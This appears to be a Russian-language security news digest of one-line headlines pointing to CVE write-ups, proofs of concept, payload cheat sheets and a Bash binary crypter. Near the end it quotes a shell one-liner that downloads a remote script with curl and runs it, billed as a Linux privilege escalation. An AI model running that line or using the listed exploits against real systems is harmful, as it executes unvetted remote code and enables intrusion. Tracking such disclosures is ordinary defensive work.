B ubuntu 24.04/24.10 тоже и в RedHat

CVE-2025-0927
*
Affected Versions
* Linux Kernel, up to 6.12.0
* Ubuntu 22.04 with Linux Kernel 6.5.0-18-generic
/
Большой WriteUP + Source Exploit.c - Linux kernel hfsplus slab-out-of-bounds Write

UPDATE: если совсем коротко то -локальные юзеры (без особых прав) могут устанавливать произвольные файловые системы через Udisks2 из-за правил для Polkit. Включая в себя ФС, чьи монтирования обычно требуют CAP_SYS_ADMIN в init user namespace.

#linux

Nginx AIxCC - Temporal safety vulnerabilities
*
WriteUP + exploit

#nginx

Зарелизился TMPOUT
*
read volume 4

CVE-2025-29927 – Next.js Middleware Authorization Bypass
*
CVSS 9.8
*
WriteUp

Jasmin Ransomware
*
SQL Injection Login Bypass admin panel
*
How to exploit 🤌

URL Validation Bypass Cheat Sheet has 200+ Payloads for all occasions!
*
Тыц

Nulled.io ВСЁ
Arrest of Lucas from http://Nulled.io

#breach

IngressNightmare - Куберноиды напряглись
*
RCE в Ingress NGINX
*
READ and WATCH

#k8s

Telegram Mac RCE - 0Day
*
господам из opzero.ru подготовить счетные машинки
*
ШУМ

CVE-2025-1974 Ingress Nightmare (k8s)
*
Вот и POC c detect подвезли
*
POC all in one

#kuber #nginx

BinCrypter
*
Linux Binary Runtime Crypter - in BASH!
*
Link

CVE-2025-30208
*
Vitejs File read vulnerability
*
POC

Search for All Leaked Keys & Secrets
*
Сила Regex

🫥
СМСните джону коннору, пора отправлять Т-777 за сэмом альтманом

CVE-2024-25600
*
WordPress
*
Bricks Builder <= 1.9.6
*
RCE exploit

Facebook SMS-based Two-Factor Authentication Bypass
*
WriteUP
*
August 3, 2024: Fixed

CVE-20250401 - 7350pipe - Linux Privilege Escalation
(all versions)
календарь чекаем

“. <(curl -SsfL https://thc.org/7350pipe)”

Что он хочет этим сказать 🧐